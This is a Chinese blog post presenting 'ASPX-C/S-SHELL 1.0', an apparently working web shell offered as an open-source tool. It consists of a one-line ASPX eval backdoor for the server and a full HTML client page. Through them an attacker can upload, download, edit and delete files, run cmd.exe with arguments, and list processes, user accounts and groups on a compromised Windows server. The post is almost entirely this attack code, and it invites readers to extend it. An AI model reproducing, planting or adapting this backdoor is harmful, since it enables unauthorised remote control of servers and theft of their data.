ASPX-C/S-SHELL 1.0

鬼仔注:这两天跑去参加慕容小雨的婚礼了,所以一直没更新,这两天见到很多朋友,有空写下。

Author : kj021320
Team : I.S.T.O

信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)

服务器端 一句话为

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%>

这个一句话不用说了!我之前已经发表文章讲解过!

client端HTML页面代码如下

<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
<title>I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320</title>
<style type="text/css">
body,td{font-size: 12px;}
table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
input,select{font-size:12px;}
body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
td{white-space:nowrap;}
a{color:black;text-decoration:none;}
</style>
<!--
Author: kj021320
Team : I.S.T.O
Description:

file/folder copy,move and view
file down , edit , delete , upload and run
server config and user information

U can extend the ASPX-C/S-SHELL function and use setCmdText(the js fucntion) to commit the command
-->
<script language="javascript">
function copyFile(s,t){
s=s.replace(/\\/g,"\\\\");
t=t.replace(/\\/g,"\\\\");
setCmdText('var s="'+s+'",t="'+t+'";System.IO.File.Copy(s,t);');
}
function runFile(s,a){
s=s.replace(/\\/g,"\\\\");
a=a.replace(/\\/g,"\\\\");
setCmdText('var s="'+s+'",a="'+a+'";var p=new System.Diagnostics.Process();p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.FileName=s;p.StartInfo.Arguments=a;p.Start();var o=p.StandardOutput.ReadToEnd();"<pre>"+o+"<pre>"');
}
function editFile(f){
f=f.replace(/\\/g,"\\\\");
var code='var stream:System.IO.TextReader,filename,os="",thePath="'+f+'",code;stream=new System.IO.StreamReader(thePath);os=stream.ReadToEnd();os="<form method=post><input name=fname value="+thePath+"><input type=submit name=s value=save><textarea name=t rows=30 style=width:100%;>"+Server.HtmlEncode(os)+"</textarea><input name=\\"'+address.KEY.value+'\\" type=hidden value=\'var stream:System.IO.TextWriter;stream=new System.IO.StreamWriter(Request.Item[\\"fname\\"]);stream.Write(Request.Item[\\"t\\"]);stream.Close();stream=null;Response.Write(\\"OK\\")\'></form>";stream.Close();stream=null;os;';
setCmdText(code);
}
function upfile(f){
f=f.replace(/\\/g,"\\\\");
setCmdText('var files=Request.Files;if(files.Count!=0)files.Get("myfile").SaveAs("'+f+'");');
}
function downFile(f){
f=f.replace(/\\/g,"\\\\");
setCmdText('var stream,filename,bs,os,thePath="'+f+'";Response.Clear();bs=new byte[1024];stream=new System.IO.FileStream(thePath,System.IO.FileMode.Open);filename=thePath.substr(thePath.lastIndexOf("\\\\")+1);Response.AddHeader("Content-Disposition","attachment; filename="+Server.UrlEncode(filename).replace("+"," "));Response.AddHeader("Content-Length",stream.Length);Response.Charset="UTF-8";Response.ContentType="application/octet-stream";os=Response.OutputStream;var i=stream.Read(bs,0,bs.Length);while(i>0){os.Write(bs,0,i);i=stream.Read(bs,0,bs.Length);}os=null;Response.Flush();stream.Close();stream=null;Response.End();');
}
function ProcessInfo(){
setCmdText('var o;var proc=System.Diagnostics.Process.GetCurrentProcess();o="<h4>CurrentProcessInfor:</h4>";o+=getProcessInfo(proc);var ptc=proc.Threads;for(var p in ptc){o+="<br>"+getProcessThreadInfo(p);}o+="<h4>OtherProcessInfor:</h4>";var ps=System.Diagnostics.Process.GetProcesses(proc.MachineName);for(var p in ps){o+="<br>"+getProcessInfo(ps[p]);}function getProcessThreadInfo(pt:System.Diagnostics.ProcessThread):String{var o="<br>Id:"+pt.Id; o+="<br>BasePriority:"+pt.BasePriority; o+="<br>CurrentPriority:"+pt.CurrentPriority;o+="<br>Site:"+pt.Site;o+="<br>StartAddress:"+pt.StartAddress;o+="<br>ThreadState:"+pt.ThreadState;return o;}function getProcessInfo(proc:System.Diagnostics.Process):String{var o="<br>ProcessName:"+proc.ProcessName;o+="<br>BasePriority:"+proc.BasePriority;o+="<br>MachineName:"+proc.MachineName;o+="<br>MainWindowTitle:"+proc.MainWindowTitle;try{o+="<br>MaxWorkingSet:"+proc.MaxWorkingSet;o+="<br>MinWorkingSet:"+proc.MinWorkingSet;}catch(e){}o+="<br>NonpagedSystemMemorySize:"+proc.NonpagedSystemMemorySize;o+="<br>PagedMemorySize:"+proc.PagedMemorySize;o+="<br>PagedSystemMemorySize:"+proc.PagedSystemMemorySize;o+="<br>PeakPagedMemorySize:"+proc.PeakPagedMemorySize;o+="<br>PeakVirtualMemorySize:"+proc.PeakVirtualMemorySize;o+="<br>PeakWorkingSet:"+proc.PeakWorkingSet;o+="<br>PrivateMemorySize:"+proc.PrivateMemorySize;o+="<br>VirtualMemorySize:"+proc.VirtualMemorySize;o+="<br>WorkingSet:"+proc.WorkingSet;return o;}');
}
function userInfo(){
setCmdText('function getUserInfo(strUser:String):String{var User,Flags,o="";try{ User=GetObject("WinNT://./"+strUser+",user");with(User){o+="<br>Description:"+User.Description+"<br>";o+="PasswordExpired:"+Get("PasswordExpired")+"<br>";Flags=Get("UserFlags");o+="passover:"+(Flags==65536)+"<br>";o+="CannotChangPass:"+(Flags==64)+"<br>";o+="GlobalAccount:"+(Flags==256)+"<br>";o+="PasswordMinimumLength:"+PasswordMinimumLength+"<br>";o+="PasswordRequired:"+PasswordRequired+"<br>";o+="AccountDisabled:"+AccountDisabled+"<br>";o+="IsAccountLocked:"+IsAccountLocked+"<br>";o+="Profile:"+Profile+"<br>";o+="LoginScript:"+LoginScript+"<br>";o+="HomeDirectory:"+HomeDirectory+"<br>";o+="HomeDirDrive:"+Get("HomeDirDrive")+"<br>";o+="AccountExpirationDate:"+AccountExpirationDate+"<br>";o+="BadLoginCount:"+BadLoginCount+"<br>";o+="LastLogin:"+LastLogin+"<br>";o+="LastLogoff:"+LastLogoff+"<br>";}}catch(e){}return o;}function Userinfo():String{var User,Group,Computer,o="";Computer=GetObject("WinNT://.");Computer.Filter=new Array("User");o+="User:<hr>";for(User in Computer){o+="<li>"+User.Name+"</li>";o+=getUserInfo(User.Name);o+="<hr>";}o+="UserGroup:<hr>";Computer.Filter=new Array("Group");for(Group in Computer){o+="<li>"+Group.Name+"</li>"+Group.Description+"<hr>";}return o;}Userinfo();');
}
function delFile(s){
s=s.replace(/\\/g,"\\\\");
setCmdText('var s="'+s+'";System.IO.File.Delete(s);');
}
function moveFile(s,t){
s=s.replace(/\\/g,"\\\\");
t=t.replace(/\\/g,"\\\\");
setCmdText('var s="'+s+'",t="'+t+'";if(System.IO.File.Exists(s))System.IO.File.Move(s,t);if(System.IO.Directory.Exists(s))System.IO.Directory.Move(s,t);');
}
function Info(){
setCmdText('var o="";o+="<br>MachineName:"+Environment.MachineName;o+="<br>UserDomainName:"+Environment.UserDomainName;o+="<br>UserName:"+Environment.UserName;o+="<br>OS:"+Environment.OSVersion;o+="<br>ADDRESS:"+Request.ServerVariables("LOCAL_ADDR");o;');
}
function check(){
Top.action=Top.URL.value;
setCmdName(Top.KEY.value);
setCmdText("Server.MapPath(\".\")");
}
function listFolder(p){
p=p.replace(/\\/g,"\\\\");
setCmdText('var p="'+p+'",output="";output+="DIR:<br>";if(System.IO.Directory.Exists(p)){var ds=System.IO.Directory.GetDirectories(p);for(var i in ds)output+=ds[i]+"<br>";output+="FILE:<br>";var fs=System.IO.Directory.GetFiles(p);for(var i in fs)output+=fs[i]+"<br>";}output;');
}
function setCmdName(n){
getCmd().name=n;
}
function setCmdText(str){
getCmd().value=str;
}
function getCmd(){
return document.getElementById("Command");
}
</script>
</head>
<body>
<table width=100% height=100% border=0 bgcolor=menu>
<tr><td height=30 colspan=2>
<table width=100% height=25 border=0>
<form name=address method=post target=Display enctype="multipart/form-data" >
<tr><td width=60 align=center>SHELL:</td><td style=width:80%>
<input name=URL style=width:90% value="http://127.0.0.1/kj021320.aspx"> KEY:
<input name=KEY style=width:5%>
<input name=cmd type=hidden id=Command>
</td><td align=center><input name=Submit onClick="check();" type=submit value=link>
</td></tr>
<tr align=center><td>path:</td><td><input name=path style=width:100%></td><td><input name=view type=submit value=view onclick="listFolder(path.value);"></td></tr>

<tr align=center><td>Opt:</td><td>source:<input name=sname style=width:40%>target:<input name=tname style=width:40%></td><td> <input type=submit name=cp value=copy onclick="copyFile(sname.value,tname.value);"><input type=submit name=mv value=move onclick="moveFile(sname.value,tname.value);"></td></tr>

<tr align=center><td>FileOpt:</td><td>Filepath:<input name=fp style=width:80%></td><td><input type=submit name=down value=down onclick="downFile(fp.value);"><input type=submit name=edit onclick="editFile(fp.value);" value=edit><input type=submit name=del value=del onclick="delFile(fp.value);"></td></tr>

<tr align=center><td>RunFile:</td><td>Filepath:<input name=rfp value="c:\windows\system32\cmd.exe" style=width:40%>Args:<input name=args style=width:40%></td><td><input type=submit name=run value=run onclick="runFile(rfp.value,args.value);"></td></tr>

<tr align=center><td>Info:</td><td><input type=submit name=req value=Info onclick="Info();"><input type=submit name=proc value=Process onclick="ProcessInfo();"><input type=submit name=userInf value=userInfo onclick="userInfo();"></td><td></td></tr>

<tr align=center><td>upfile:</td><td><input type=file name=myfile style=width:40%>save:<input type=text name=safile style=width:40%></td><td><input type=submit name=up value=upfile onclick="upfile(safile.value);"></td></tr>
</form></table></td></tr><tr><td>
<iframe name=Display width=100% src=http://blog.csdn.net/I_S_T_O/ height=100% scrolling=yes></iframe>
</td></tr></table>
</body></html>
<script>
var Top=top.address;
</script>

基本上平时ASPXSHELL的文件操作功能我都加入进去了 注册表跟数据库操作的没写!多加了个进程浏览 用户组浏览 具体更多的功能迟点再更新吧~具体更新信息请关注I.S.T.O 开源项目区http://blog.csdn.net/I_S_T_O/category/325894.aspx 没有实现的功能,有兴趣的朋友可以接力 :)

相关日志

发表评论